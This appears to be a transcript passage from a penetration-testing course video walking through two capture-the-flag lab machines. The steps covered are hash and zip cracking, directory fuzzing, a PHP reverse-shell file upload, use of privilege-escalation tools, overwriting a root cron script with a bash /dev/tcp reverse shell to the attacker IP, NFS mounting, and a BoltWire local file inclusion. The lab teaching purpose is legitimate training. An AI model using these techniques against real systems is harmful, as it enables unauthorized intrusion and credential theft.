instance, it's going to go a lot slower, but because it's going to be an easy password to crack, we don't have to worry about it too much. But if you want to be good at cracking passwords and practice that, definitely make sure you're using it on your base OS, regardless of what it is, because it's going to crack a lot faster than running it in your virtual machine. So we're going to do a hashcat. Actually, before we do that, go ahead and type in locate rocku.txt. You should have it somewhere. Okay. You might have a tarred version of it or a gzip version of it. You can open that if you navigate to this folder, like user share, come in here to your folder, like literally go into browse network or file system and go into user share, etc. You can get there if for some reason you do not have rocku.txt. In the later version of Kali, they already have it here. So I'm assuming that it's here. If not, if all you see is a gzip, go ahead and just unzip that. Now, what we're going to do is we're going to say, actually, one more thing I forgot. You can go ahead and do a mousepad or gedit or whatever you want. You could do a hashes.txt. Copy and paste the hash. It's a little small probably for your screen from what you could see here. Copy and paste the hash into this hashes.txt, the one we got right here. Okay, make sure it's in a file. So once we've done that, go ahead and run hashcat with a -m of 0. That's a module. So we're going to be attacking the module of 0, which correlates to MD5 hashing. We're going to give it the file of hashes.txt, and we're going to give it a word list to run through of rocku.txt. Okay, and I'm going to scroll up just so you can see this. It's going to run. It might take a minute to run. It took me a couple seconds here. Gets through it pretty quick. Rocku runs fairly fast on a VM, and this one picked it up pretty quick. So the password of what's coming up is student. Password of student. Not very great password. Weak password policy. Okay, so we have a username. We have a user ID. We have a password of student, but we have no idea how we're going to do this. Okay, where are we going? Now, I can take some educated guesses here. Like, for example, they're saying, hey, this is for the new academy, and this box is called academy, and there's a good likelihood that if you were to do a /academy on the web page, that maybe you find it, right? And we can go academy and go find it, but I don't want to just show you and cheat. So let's go back and we're going to walk through it. We talked about directory busting with dirbuster. I want to show you a couple other tools that we can use and show you the pros and cons of both of them. So open up a new tab. Make sure we're going to use two different tools. So I want to show you both. Go ahead and use a tool called dirb, D-I-R-B. And for dirb, all we have to do, I do believe, is just type in 192.168.138.129 and hit enter. So this is going to go off of the website. It's going to run on its own word list. It's going to go in here and try to find stuff. Immediately it found phpMyAdmin. The issue is with this, it's just going to go in and start like going into the phpMyAdmin and looking for directories, and it's finding all kinds of directories, and this is going to take a minute. So this is one way of doing it. Another way of doing it is using a tool called ffuf. I don't know how you say it. Ffuf, whatever. Everybody's got their own pronunciation. If you do an apt install of ffuf like this, you hit enter. I already have it, but yours should pick it up. Okay, we're going to run the tool just like this. So we're going to say ffuf once yours is installed. Do a -w. That is for word list. And your word list should be in user share word lists. And we can do dirbuster, that's fine. This is where all the word lists are. And then I just like to double tab or tab around, and we're going to use the medium word list. That's my go-to for most cases. We could use the lowercase if we wanted to. I think either are fine. Okay. From here, we're going to go ahead and back up. And now what I'm going to do is I'm going to put a colon here, and I'm going to type in fuzz. Okay, this is what we're going to fuzz. We're going to do a -u, and we're going to do HTTP 192.168.138.129, and we're going to say /fuzz. So what we're telling this is, hey, with this word list, we're going to be fuzzing with this word list. We're going to fuzz this parameter right here. Is exactly what we're doing. Okay, we're going to hit enter. And this is immediately going in and just doing all that we want to do. It found Academy right away, PHP my admin right away. And this is very fast. Found a server status. And all it's doing is looking one thread deep. So it's not doing what Derb is doing. Derb is going and saying, hey, I found PHP my admin. Now I'm going to go through and find every single directory inside of that and every single directory inside of those directories, which can take a while. This one is saying, I'll find all the first level directories. And if you want to go search those, you can. Like we could type in academy/fuzz. There's commands in here that we can do to take this further. We can limit which response statuses we want. Maybe we only want 200s or maybe we want 302s, depending on this. So maybe we don't want any 401s or 403s or 405s. We only want the ones that come back as 200 guaranteed. So in this case, we're looking like we got a 301 from Academy. So there's a redirect there. Same with the PHP my admin. All right. So with that in mind, this is how you can find it. Found it quick. This one's still going. There's different strategies, different tools, everything else. This one's pretty nice. There's a lot of tools that come out for directory busting all the time. Latest ones are being built in Rust, which is interesting because Rust is really fast. There's ones built in Go because Go is really fast. So you pick your poison on a directory busting tool and you just run with it. So anyway, we're going to go ahead and enter in that registration number. So you can go ahead and just come copy it from here. And then you're going to go ahead and paste that. And then the password is student. For me, I've changed the password in here because I've already gone through this box. But you'll be brought to a change password screen. So you could type in student, change it if you want to. You really don't have to. You can come in here and start clicking through, hey, I want to enroll in a course, enroll history, my profile, change password, etc. So this is really what we have. Now, the interesting thing in here is that we have this upload photo feature. So if we look at this, we can come in here and say, okay, how do we want to attack a website? What are some ways that we can get code execution? We might be able to perform like LFI, RFI attacks on this and pull down information or execute code. Maybe there's SQL injection somewhere in here. We can pull down and dump the database. We did see a PHP my admin. Maybe there's more behind this, behind the scenes that we can do. We can also go out, and something that we didn't really look at on the first scan is we can do a version check. Like we didn't check on this version to see if there's a vulnerability there. That would be something you can do. Same with the OpenSSH, same with the Apache. You can go and do those. I'm only not showing you that because I'm saving time here, but the correct methodology would definitely be to go check these as well to see if there's any vulnerabilities. Now, there is in here this is a online registration. You can look and see if there's any way to pull down like viewing the source and see if maybe anything in here would tell you, hey, what CMS is this? What is this built off of? Because clearly this is a CMS of some sort that they've used. Now, with that in mind, we can go back and we can kind of just look and see if we can find anything. The first thing we might want to do is just come in here and do a browse and come and say, okay, I'm going to upload, let me go to my desktop. I'm going to upload a picture of a dog. You don't have to do this. I just wanted to see if it works. Okay, so I uploaded a picture of a dog. Perfect. Now, the question here is, and by the way, we could see up here that PHP is in use. I'm going to make this a little bit bigger, by the way, but PHP is in use. So it should say my-profile.php. What we want to do is we want to see if we can upload a file that is not a dog. Okay, like not a JPEG, not a GIF, not whatever, PNG. We want to see if we can upload something that's not a photo and abuse the file upload system. If they're doing no checks here and we can just upload this, they are in big trouble. So what we can do is we can right click and go, we can view image, which will tell us kind of where the image is stored. So it's stored in Academy student photo / and this is dog.jpg, which is what I uploaded. So what we can do, let me refresh this. What we can do is try to upload a reverse shell here and see if we can't get a connection back by viewing this. Let's see if we can upload something malicious. Now we know this is Apache, so we're going to upload via PHP. So I'm going to go ahead and do that. What I want to do is go out and we're going to do a quick search. We're going to go to Google and we're going to say PHP reverse shell. And there is a great one out there from Pentest Monkey. Okay, first hit should be up here. There's other ones that you can use. People have their preferences and their favorites. This one is 6 years old and still works perfectly. So all we're going to do is go raw here and copy this. Control A, Control C. Very quick. And what I did was I went ahead and put this into a file here. So let's go ahead and clear screen. You can just do mousepad, gedit, nano, whatever you want. Actually, I might nano this just so you can see. But I called this shell.php. And then I pasted it in here. That's all you got to do. Shell.php, paste it in here. I'm going to scroll down a little bit. You're going to get to this little part after the comments. And you're going to see, hey, it says change this, change this. You need to put in your IP address. Whatever your IP address of your attacker machine is, that needs to go here. So if you need to open up a new tab, come in here, do IPA or ifconfig, 192.168.138.131. Come back. That matches what I've got. 1, 2, 3, 4, in my opinion, is fine. You can leave it as is for this machine. So, Control X. This is fine. You can hit yes, save if it asks you to. Just hit Y and enter, and that will save your shell.php. So we have shell.php. We need a listener. We're going to do a reverse shell here. So 1, 2, 3, 4 on the NVLP on Netcat. This should not be unfamiliar to you. You should already be aware of this. So we're going to go here, and now we've got this listening. We're waiting for something to happen. So we're going to go back into this, and we're going to upload this malicious file. So I put this in my root folder, shell.php. Click update, come in here. You can see nothing's happened. Let's see if it tries to execute. Oh, it already executed. So we don't even have to go to, like, we don't have to right click and go to that that location. It already executed that file when it loaded this page, which is crazy. So we have a shell here, which is great. So if we do a who am I, you can see we are the www-data user. So we are not an admin on this machine. We are not root. We can do a sudo-l, but they rudely took away sudo. We could type in which sudo and see if it's there. Locate sudo, maybe they put it somewhere else. Locate not found either. So they're playing a little bit of games with us, just a little bit, because we should be able to run and see, hey, what privileges do we have as sudo? But it's not there. That's okay though. We're still going to be fine. So what I want to do next is we land on a machine. We're not a root user. We need to perform privilege escalation. This is where things get fun, and this is where we're going to take a bunch of winding roads to get to where we're getting. So what we're going to do now is we're going to use a tool called linpeas, and we're going to utilize that to do some searching. Linpeas is a automated tool that goes out and does basically hunting for any sort of privilege escalation. And I kind of cheated a little bit. Let me go to Google and just type in literally LIN, like Linux, PEAS, like the food, peas. Hit enter. You'll see it here in GitHub. And you see a linpeas.sh updated 3 days ago. Nice. All right. And this is going to go through and perform all kinds of checks to see if there are any escalation privileges or privilege escalation or paths for us with privilege escalation, what I should say. So you can go in here, again, raw, Control A, Control C. And what I like to do, and this is how I actually operate, is I like to make dir on a transfers folder. I call it transfers. And I've already got one, so I'm just going to cd into transfers. Or transfer is fine as well. ls in here, and linpeas.sh is already in here. So you can nano linpeas.sh, same thing. Just go ahead and get it into this folder and have a nice little transfer folder. Make sure you copy, paste it, put it into a file, and have it ready to roll. So what we're going to do is we're going to host up a web server. So we're going to say Python 3-m for module. And we're going to type in http-server 80. Okay, and this is going to host up a web server in this folder. We're going to go and grab this file on this machine. So a good place to put a file that we want to dump on this machine is we're just going to put it right into the temp folder. So cd into temp, print working directory. We're in /tmp. Okay, so what we're going to do now is we're going to do a wget http your attacker machine IP. So I'm at 131 /linpeas.sh. Hit enter. It should copy over. You can see it coming through. Do a quick ls. I already had linpeas on here because I was running through this box earlier, but I'm going to use the original linpeas. So pretend with me. We need to make it executable. chmod +x, or change mode, linpeas.sh. Okay. Now we're going to run it. ./linpeas.sh. Just like that. Hit enter. It's going to start just flying across the screen. It might take a minute to go through. We're going to go through some of this, but I'm going to give you the general gist of what you're looking for and the things that you want to look for in here. So I'm going to take this and scroll back up to the top. If yours isn't done running yet, that's fine. I kind of just want you to watch anyway on this one. So we run it. We get a nice little Ninja Turtle. Cute. And you go through and it tells you the legend on here, okay? And it says, hey, red, yellow means 95%. Could be a privilege escalation vector. Red, you should look into it. And then it gives you different ones. So really, we're looking for red. And we're just trying to see if we can find anything in here that could be of interest for us. Now, as we're scrolling through, it gives us information about the, the Linux distribution, the release, all that. That could be useful if we have some sort of escalation against this. There are different types of escalation that we could use, and the release information could be important to us, though it is not for this machine, so we're going to skip over it for now. You go through, it tells you all kinds of stuff about the all the operating system, what's running on it, and it's looking for anything that could be of interest. Now it's telling you, hey, what do we have that we can run? This just says, yes, this is a virtual machine. Keep going through, keep going through. This is looking at cron jobs, which we'll talk about in a little bit. This is looking for any sort of systemd timers or cron jobs. We have no cron jobs running that look relevant to us. This is just running Apache 2. This is running a, and this actually looks like it could just be the processes running, not even the cron jobs. So these are just the processes running. Nothing of interest to us right now. Scrolling through here, we're just going to look and see if we find anything of interest. Now there is a highlighted red and yellow here with home grimy backup.sh. We're going to copy that bad boy, see what it is. And then from here, you're going to go ahead and just keep scrolling. So we come through, keep scrolling, keep scrolling. And a lot of this is just information that is provided with us. What is of interest, and for this machine now, you're welcome to read through this. There's a lot of data to read through. I like to scroll through kind of really quick and just see if anything stands out, not at this pace, but like right here, look, we're scrolling through and we see, hey, there is a MySQL password of my very secure pass. That is of interest to us. It looks for passwords, and we're going to scroll down to the bottom. I'll show you kind of what it looks like. So if we scroll all the way down, we start scrolling up a little bit, you'll see that the my very secure pass shows up again. It shows up right here, and it tells you, hey, this is in this includes config.php file. So that's really what we're looking for. We've got a password up here, manage students at 12345, so we can go look at that if we wanted to. And some things in here that we want to make note of. So maybe we open up a notepad, like we come into a text editor, we just do a paste here because the Grimmy's of interest. We found the password of my very secure pass, which maybe we want to just copy this whole thing out. Okay, and I might put that into my little notes as well. And maybe I want to read this document and see what's in here as well. So this is of interest. We want to go through and just see anything of interest. Now I am skipping ahead just a little bit only because to save time for the video, there will be other opportunities to learn privilege escalation. And again, we have the privilege escalation course if you want to go through this in more detail. This is again just trying to get your feet wet, introduced to the idea and understanding what we're doing here. So now let's go ahead and let's look at the file that we just found first. We'll wait on the Grimmy file. Let's go ahead and just cat this out. Okay, so if we cat out this config.php, we see that we get a SQL user of Grimmy. We get my very secure pass. Okay, we get some information there. So we can maybe try to see if this works for us anywhere. It's a SQL user database. Maybe we can get into the SQL database and find some information. That is one option, though I did not see any sort of information for SQL unless we could log into phpMyAdmin with this on that web panel that we were looking for. So that's something that could work. We also want to see if there's anything. Maybe we go cat Etsy password, see if that works for us. Okay, so Etsy password is showing us all the users on the machine. Of interest, we like to scroll down to the bottom and we see a user of Grimmy. And it says Grimmy's an administrator, which is interesting. So it's pointing to Grimmy being a user on this machine. So it doesn't hurt to just copy this password and see what we can do with Grimmy. So what we can do here is I'm going to go ahead and just go to a new tab. And I'm going to cat. And by the way, we should have known that anyway, because there was a folder called home Grimmy backup.sh or home Grimmy. So Grimmy would have been an indicator anyway that that we were up against a user named Grimmy. So we do SSH, we can do Grimmy at, and this machine is 192.168.138.129 for me. Go ahead and hit enter once you got it in there. And it should ask you your first time about a fingerprint. Just type in yes, hit enter, and then go ahead and paste in that password that we just got. And maybe I copied it wrong, so I'm going to go copy that one more time. Okay, and here we go. So now we are in this machine. We don't have sudo access, I don't believe. Sudo-L. Again, it says sudo not found. It could be that we have a broken version of bash or they intentionally removed it because it's just CTF. That's one of the first checks I do. History is another check, though I have some history in here from myself. So you might not have any history when you come in here. This is just all me doing this. Now, one thing that I do again is I like to come in and I like to download LinPs, run it again, see if anything's changed. I'm going to skip over that process, but I'm just telling you for the process. What we want to do is we want to make sure we look at the file that's of interest. Okay, so that file, when we went and saw, was in the home Grimmy folder. So let's just go ahead and cd to home Grimmy. And we're going to ls in here. And all we have is backup.sh. So let's run cat backup.sh. So what we have is, it looks like it's removing a temp backup file, .zip. It's zipping up a backup.zip from this var HTML Academy include. So it looks like it's doing a backup of the Academy, and then it's changing the permissions of the temp file. So if we look at temp, there may or may not be a backup.zip sitting in there. So what this is telling me is this is probably going out there and doing periodic checks, or a script is running periodically to see if, or to perform this backup. So it could be running every hour, every day, every week. We don't know what it's running. Now we can see if by chance we have access to that information. When we were looking at the cron information from LinPs, I didn't see it in there. We could also do a cron tab -L to see. Here we have no cron tab for Grimmy. So what's happening possibly is that Grimmy doesn't have the cron tab. We can try to see if we can cron tab of a user, look at root and just do a -list, but it says you must be privileged. So we have to run sudo, but we don't have sudo. So we won't be able to switch into root to use that as well. We don't have privileges to do that. So without having any cron tab information or seeing it running when we looked at the cron, we could do a cron tab -E as well. I just don't, I mean, there's nothing in here. So this isn't giving us any indicator. And a cron job is something that will run for us, by the way, and we tell it, hey, I want to run this script every hour, every minute, every day, every week. We could tell it when we want it to run. So this is a realistic scenario in that sense that cron jobs are used in administration. So from here, if we don't have that, there's something else called a system D timer. We can look at that from systemctl and just say list timers and come through like this and see if there's any script in here running that's in a timer. And I actually don't see anything here. You can hit Q for quit and that'll exit this. So when we have this situation, there's a tool that we can use out there that will actually give us more information of what's running with the processes than what is leading on. Remember, we ran a PS with the we ran PS for everybody with the script, the linps. We saw it. We didn't see anything in there that was any indication of this backup.sh. So if we want validation and confirmation that this is running on a timer, we can go ahead and go out, and there's a tool out there that is pretty neat. It's called PSPy, PSPY. And all you have to do, literally all you have to do, Google this, by the way, I'm gonna do it just so we could say we did it. PSPy, literally the first thing that comes up. So in here, what you wanna do is go ahead and download the 64-bit static version. And when you download that, you might get put into your downloads folder. All you have to do is, we'll open a new tab here real quick. All you have to do is do a move command, if you don't remember. So move, downloads, PSPy, and then just put that in your transfer /PSPy, okay? PSPy 64 is actually what it's called. I'm just winging it here. I've already got it in my folder, but make sure you move it over to your folder. Or if you want to keep it in downloads and run from there, that's fine as well. Just note that I already have this in my folder here. So all you have to do now is cd over to your temp folder. If ILS, I've got some stuff in here. Looks like linps backup.zip is sitting in here. What I'm going to put in here is this PSPy, and we're going to run it. So I'm going to do a wget. And remember, I already have my listener for my web server running from earlier. So this is just going to be a simple grab and go. And this is PSPy 64. Grab this. All right, ls chmod plus x on PSPy 64. And we're going to run it. Now, what this is doing is showing us all the processes running on the machine. All of them. And we could scroll through this and kind of see, and yours is going to look different than mine. Don't worry about the PID numbers. Don't worry about the timing. Don't worry about anything like that. All you got to do is scroll through here and see if we can see that backup.sh running. And we can come through, see if there's anything in here. And look, now it showed up, backup.sh. I don't think that was there before. So what happens is it just waits for this to run. And then when it runs, we're seeing it come through here. So that looked like it just ran. If we wanted true confirmation, we could sit here and wait another minute and see if this runs, because my hunch is it's running every minute because this is capture the flag box. So we could do that. I'm going to tell you that it is running every minute, so we don't have to do that, just to save a little bit of time. So Control C, get back into your Grimmy at Academy. And now we are going to abuse this in our favor. Let's go ahead and go to CD home Grimmy. We're gonna go back, make sure you have your backup.sh in there. And now what we're gonna do is I want you to go to Google, and you go and say bash reverse shell one-liner, okay? And there is a reverse shell cheat sheet from Pentest Monkey. You could also type that in. Click on that. Here you will see right up front, you will see bash-i. You're going to see this right here. This is a one-line reverse shell. This is awesome. All we're going to do is put this into a shell script, which we already have. We have it right here. We're going to put that in there, and when it executes, it's going to perform reverse shell. So what we want to do is we want to modify this a little bit. So let's go ahead and open up a notepad real quick. It might be a little bit small on your screen for you, but what I'm doing is I'm putting in where it says 10.0.0.1. I'm putting 192, 168, 138.131, which is my attacker machine, and I'm going to change the IP address to 8081, or to the port to 8081. You are more than welcome to keep it at 8080. I'm just doing this because I ran through this once earlier, and there's a possibility that port is still out there lingering. So just for the video purpose, I'm changing it to 8081. So what does that mean I have to do? Netcat, NVLP, set up that reverse shell listener. And here's what's going to happen. We're going to come in here and we're going to say nano backup.sh. You can come in here, tab down a couple times, and if you hit Control K, it deletes a line. That's some magic if you didn't know it. And you can come right click, paste selection, maybe paste clipboard. Okay. And what we're going to do is this is going to execute bash-i dev tcp 192.168. It's going to call out to our IP address with this. And if our hunch is correct that this is running as the root user, we're going to get a root shell on this. So what's happening is this cron job is out there. It's running as root. It's executing as root. And when it executes that script, it's going to execute as a root shell, which it just did. You could see root at academy. Who am I? Okay, so let's cd to root just for the fun of the game. Maybe cd root ls. Okay, and then cat flag.txt. Says, congrats, you rooted this box. Looks like this CMS isn't so secure. I hope you enjoyed it. If you had any issues, please let us know in the course Discord. Happy hacking. Great. That was an example of a box with a couple of pivots, a couple of different privilege escalations, and very gamified, very capture the flag. You will likely never do most of this on a pen test ever in your life, but it's still important to learn from the hacking process as we build up into this and then as we get into more of the Active Directory stuff. So that is it for this video. We're going to go ahead and call it here, and I'm going to go ahead and catch you in the next one. Okay, on to the box dev. Now let me preface this with it is raining pretty bad here, so if you hear thunderstorms or anything in the back, consider it part of the ambiance. But we're going to do another box from Alec. Thank you, Alec, for creating this wonderful machine. And this box is a Linux machine, so you should already have it set up. We're past the setup stage. You should know how to set it up. Come in here. I already have an mmap scan ran against it. So if you do not have an mmap scan ran against it, you should go ahead and do that. Pause if you need to. Otherwise, you could just follow along. So running the mmap scan, we can see that we have port 22 SSH. And remember what we said about SSH? Well, we're not going to look at it right now. It's nothing that's, at least in my experience, I've ever found an exploit for. So unless we have credentials or something for that, we're not going to get into SSH. We have something on port 80 called Bolt installation error for Apache web server. Okay, that's an indicator this might be a Linux machine already because we're seeing Debian. That's a nice indication. We have RPC bind, which we can enumerate RPC, though it's not that advantageous for us right this instant. That gets into more advanced stuff. Honestly, as a beginner, we're going to leave RPC alone, though there is some information gathering that you can get out of RPC. As of right now, we're going to just kind of push it to the side because we've got more important things to focus on and more common things to focus on. So we have 2049 NFS, which is a network file share. Think of it like almost like SMB, like Samba for file sharing. This is a network file share. We can potentially mount to a file share here, so that might be of interest for us. We also have HTTP here for 8080. It just says connection Apache Debian PHP info page. We've got some Mount D and nlock manager. We're not going to worry about any of these ports. Which stand out to me are 8080, 2049, and 80. Okay, so keep those in mind. As you go through these more, as you get better at this, it'll be easier for you to understand which ports you're looking for, which ports you can kind of just throw to the side for now. So with that, we're going to go ahead and take a look at 80. We're going to take a look at 8080. Then we'll take a look at the network file share. So going out to the web page, I have Google open. I'm just going to go 192.168.138.137. Go here, and I'm also going to copy this and take this out to port 8080. And you can see that we have a couple of pages. One is a Bolt installation error page. which is interesting. We can come out and look at this. It looks like there's something called Bolt. We can actually go to the real web page here and see what's running. Bolt CMS. So we'll keep that in mind. Maybe they're running Bolt CMS. We could put that in our back pocket in our notes. It looks like there's an installation error. It's talking about the folder that should be installed in, which these are Linux folders. So this is more indication that we're likely attacking a Linux machine here. So we can do some research on this, but let's put that in our back pocket for now. Other website here is on port 8080. We're getting a PHP info page, which is nice. Sometimes this can disclose some information. You can actually read through this and see like, here's the path, here's like the webmaster, here's the IP address that we're pointing at. So there's some different things in here that we can look at, and possibly if we were attacking this page, there could be some information disclosure in here that could tell us what the setup is of this PHP page. And that could tell us like, hey, maybe there's file inclusion, maybe there's uploading allowed, different attacks that might be enabled because of a setting that is configured or misconfigured in this PHP myinfo type page, or PHP info page. So we have two pages here that are, I mean, there's nothing really there. It's just like, hey, PHP info, Bolt, installation error. So we kind of want to look under the hood. This is just common tactic here that we're going to open up a new tab. I'm going to open up two of them. And we're really just going to enumerate this a little bit further. I just want to see how far we can take this. If it is what it is, like port 80 is literally just a Bolt installation error page, that's fine. But we need to confirm that. So we're going to use FFF, whatever you want to call it. And we're going to do a quick scan on this. And we're going to do user share wordless. And then I go to dirbuster. And just like before, you can just tab. And I use the medium word list. I put a colon. I don't know how to, if you know the trick of getting it to line up immediately after, let me know. Otherwise, just go delete that one space. We can fuzz here. And then we could do a URL of HTTP 192.168.138.137 for this machine /fuzz. Now, before you hit enter, go ahead and copy this. It'll make life easier. Hit enter. Let that bad boy run. Come in here, paste again. And all we're going to do on this one is we're going to put 8080 at the end of it. So we're going to fuzz against 8080 and port 80. And we're going to let these run a little bit. Okay, so we'll let these run, perhaps finish, see if we can get anything of interest out here. While they're running, we can multitask. This is part of the process, by the way. As an ethical hacker or hacker in general, multitasking is important because you, if you're on an engagement like a pen test, you're going to be doing a lot of things at once. Because imagine a situation where you have 1,000 IP addresses and you have a week to go against them. If you only have a week to do 1,000 IP addresses, you're talking like a few minutes per IP address to look at. So you really have to identify and scan for low-hanging fruit, figure out which IP addresses are the most advantageous, go touch on those more, and perhaps be spending a couple minutes on each at the same time while you're doing this. So it's advantageous to look at multiple things, have scans running, and be bouncing back and forth from an ethical hacking perspective, and you pick up the ability to multitask over time. So anyway, we have this NFS, this network file share, and I'm curious if there's anything there. So what we can do, I'm going to go ahead and just open up a new tab, make this a little bit bigger. What we can do is we can say show mount. This is a command already built into your machine. If you're familiar with Linux, you probably know this. Put an E there. We're just going to list out the directory that's here, the mounted file share. Hopefully that there's one. Okay, and we're exporting from here this. Okay, this is the file share that's offered up. So we've got, looks like server NFS, network file share. So what we're going to do with this is we're going to go ahead and utilize this to our advantage. We're going to mount and see what we can see in this share. So in order to do that, we need to make a directory to mount to. So I'm just going to make a directory called mount, MNT. We have an MNT folder by default. And then I'm just going to call this dev since that's the name of the machine. All right. And then we're going to mount this. So we're going to say mount tact NFS So this is the type, it's NFS. And we're going to say 192.168.138.137. And then we're going to do server NFS. Okay, so we're calling out on this machine is this server NFS or SRV NFS. And then we're going to put it in mount dev, just like that. All right. So now we can go cd into mount dev ls, and you can see that there is a file in there. That file is called save.zip. So I'm going to go ahead and try to unzip that. And it says, hey, we need a password to unzip this ID RSA file. I have no idea what the password is. So looks like there's an ID RSA in here and a to-do.txt, and we don't have the password for either of these. Now, there's a possibility that we go online, we look through some of these folders, maybe something comes back, there's a password in there, that's the path to go. The other thing that we can do is see if we can crack this very quickly. If we can crack it, then maybe we can get in there. And there's a tool out there called fcrackzip. So we can do something called like apt install fcrackzip, just like this. And I've already got it installed, but you should not. It doesn't come by default. Okay, go ahead, let that install. Should only take a second. And then come back. And now we're going to do fcrackzip, just like that. Yours might not auto tab. You might just have to type it out. That's okay. -V for verbose. We want to have verbosity here. See all the output. -U just means we're going to be unzipping. So we're going to unzip the files here. And a -D means we're going to be using a dictionary attack. And a -P means we're going to be using a file in order to attack. So the dictionary attack we're using is the user share wordless, and then we're going to use rocku. Okay. And on this other part, for the -P, we're going to go ahead and use this save.zip. So we're using a string here as the initial password file, which is what we're doing. If we didn't have this here, it would just start attacking via the files inside. So we're calling out specifically, and then here we're saying we're using a word list. Here's the word list we're using. So I'm going to go ahead and run that, hit enter. Okay, and you can see that we have found password is equal to Java 101. So now if we go to unzip save.zip, type in Java 101, hit enter. Okay, we ls, they should be here now. So let's cat out the to-do.txt. It says, figure out how to install the main website properly. The config file seems correct. Update development website. Keep coding in Java because it's awesome. And then we get a signature from JP. We don't know who JP is, but we do get an ID RSA file. So that ID RSA file can be used in order to connect via SSH. Now, we don't know who the user is. There's a chance that the user might be JP, so we can do something like SSH-I. I'm not sure if the permission settings here are going to be correct in this ID RSA file. We'll see here in a quick second. And then we come in here and we say something like JP at 192.168.138.137. Cross your fingers, type yes. It asks for his password. We don't know a password. So we're not even sure if that's working. We're not sure. It didn't even look like it took the ID RSA. So we're not sure if this guy's even a user. So let's keep this information in our back pocket for now. We have this, we're going to clear screen. We have this ID RSA file, and we have some information hopefully sitting here waiting for us. So on the port 80 side, we have a public 301, we have a source 301, we have an app 301, vendor extensions. Okay, so maybe we come in here and we take a look at that. Also on this side, we have a dev directory. So if we go in here and we just /dev, we are brought to this bolt wire application, which is cool. On here, we have a few different directories that came back. Let's see. We have public source app, so we can kind of go through those manually. Just public, see what's there. Nothing's there. Bolt user first, it says. Source site. We get a customization extension, PHP. I don't know if there's anything in there. You could open that. Doesn't look like it's going to go anywhere. Next, we go to app, kind of come through here. And this is where we find a directory. And I think I said in one of the past videos that it's kind of realistic. I have seen this actually on a pen test before, where you come across a directory, and this directory listing can be a finding. One time I literally came in here and the first thing sitting at the top of the directory was SQL database with all the passwords and information in here. So looks like there's a Bolt database in here, though the size is 0. I clicked through here earlier, trying to click around, see if I could find anything. Cache is interesting, but config would probably be more interesting, especially a config.yaml file. So I went ahead and just downloaded that, and then I have it stored here. I'm going to go ahead and just open that up, and I encourage you to do the same. Open with mousepad, open with whatever you like. Here you can see that it says, hey, the username's Bolt and the password is I love Java. So I'm going to copy this. We don't know where this works, if this pays off for anything anywhere, but we're going to save this information kind of in our back pocket. So I'm going to do a new tab in here and just paste that, because that's some information that we got. So the other side of things is that we also have a BoltWire application, and we can come in here and look around. It looks like there's a registration page. Might be able to register like hacker and password hacker. Come in here, and it doesn't look like it's letting us do anything else. So we're clicking around. We got some search features. It doesn't look like it's doing anything. Can print some information on the site. So it's best to click around, see if there's anything of interest in here, but I'm not seeing anything at this point in time of interest. So as of right now, I'm curious as to this BoltWire, if there's anything, any vulnerabilities that exist. So we can go out to Google. Actually, I have Google open right here, and we can just say like BoltWire exploit and see what comes up. Now there's one from 2020. There's one from 2012. I'm going to use the more recent one, this local file inclusion. We could also search this on our Kali machine, by the way. We can go in and just do like a, let's see, we can do a search exploit and just do BoltWire and see what comes back. And you can see that all that shows up are multiple cross-site scripting, which cross-site scripting is not going to have any effect for us. Like putting cross-site scripting here isn't going to do anything on a box like this unless they are from a CTF standpoint, unless there's somebody mimicking a user going in and actually navigating the website. There's no use for even attacking cross-site scripting. That's not to say that this is not a great vulnerability and this is something that you would see in the real world. You absolutely do. But we attack real users with this. That's part of it, because you store cross-site scripting or you store JavaScript and you attack users with that. We're not attacking any users. We're just attacking this box at this time. So what we're going to do then is probably really focus on this local file inclusion. So let's take a look at it and open this up. We'll talk about local file inclusion, what that is, what it might be. So really quickly, local file inclusion allows us to potentially expose files that are running on a server. And this can lead to information disclosure, as you're going to see here, remote code execution, cross-site scripting. There's a lot of things that it can do. So basically what's happening is it is accepting this path here as input. It's a coding error on the development side. So we're able to input this, and what we're doing, .. // imagine you're in a Linux machine. We're literally just saying, hey, I want to go back as far as possible to a base directory, and then etc password. Okay. So this could be as many directories as needed. You could throw in 10 of these and it might work. And then we're trying to get the etc password, because this will allow us to see who's on the machine running. Now, if this is running as a root user, then guess what? We can run this as etc shadow and go grab the hash, and maybe we have even more sensitive information. But this attack by itself is pretty cool and is it's not seen in the wild as much, but it is definitely out there. So it's something we test for on every web application. So what we're going to do here is we're looking for local files. Remember, this is local file inclusion. So No remote files, which is a different type of attack. LFI here, not RFI. So it looks like we're using action, search, action, and then this attack frame here. So I'm going to go ahead and just copy this. I'll show you why. Because I was looking at the application, and you can see that here's the index.php, p equals welcome. In here, it's very similar, p equals action.search. So this is on the search feature, it looks like it's happening, or on the action parameter. So we're going to go ahead and paste that in here. Make sure you've created an account, by the way. If you do not have an account created for this, then it is not going to work. I don't know if that says that in here, that you need to be authenticated or not. Oh, it does. Being authenticated. So if you're not authenticated, it will not work. So you can come in here, just come over here and paste, cross your fingers, and it works. So one thing I want to try real quick is like Etsy shadow. Nothing. It was worth a shot. You never know. So we're not running as a user that can read the Etsy shadow file. So in this instance, we're just looking at a user that can read the Etsy password. That's okay. We're not a high level user here. And what we can do is we scroll down to the bottom. We always know root's at the top. Scroll down to the bottom to see who your users might be. And out of anything that stands out in here, there's only one user, and that is our friend JP, who looks like his name is Jean-Paul. So I think we have a user here. So this explains why the JP didn't work for us before when we tried logging in on the machine, because John Paul was the user that we had, and he wasn't on that machine. So we were looking for John Paul. So now we found a little bit more information, and we can tie this all together, hopefully, and actually exploit this machine. So I'm going to go back. Where was the mount that I had? I'm going to go back in here and try SSHing again with this file and do a Jean Paul. And it's asking for a password key phrase. Okay, so there are two options that we can do here. Option number one is you are capable of brute forcing this key ID RSA. John the Ripper can take this and push it through. The issue is if the password doesn't show up in your word list, or the password is too strong, for example, then it's not going to work. We also have some information that we found before that might work out for us. We already know that John Paul, or JP, said in his to-do that he is a lover of what? Java. And he comes in here and we have a password saying, I love Java. Now, my hunch is this probably doesn't show up in Rocky, and we can do a quick check on that actually. So let's just do a cat user share word list Rocky like this, and you can just watch, and then we're just going to grep on this password. It doesn't show up. Like where if you wanted to grep on like pasta, you could see all the different times pasta shows up in this word list. So that if we were to run Rocky against this with the word list, it wouldn't have worked. Now if we would have had a really good word list, possibly it shows up, but we already know a little bit about him. We're going to go ahead and try pasting that in, and of course it works. Jean-Paul really loves Java. So Jean-Paul at dev has logged in, and now we are the low-level user. So we'll do a quick ls, print working directory. We're in his home folder. There's nothing here. Some things that I like to do immediately. History check. Okay, it looks like somebody cleared out the history. Somebody ran a sudo-l in here, exited. Sudo-l is the second check that I like to do, or even first check that I like to 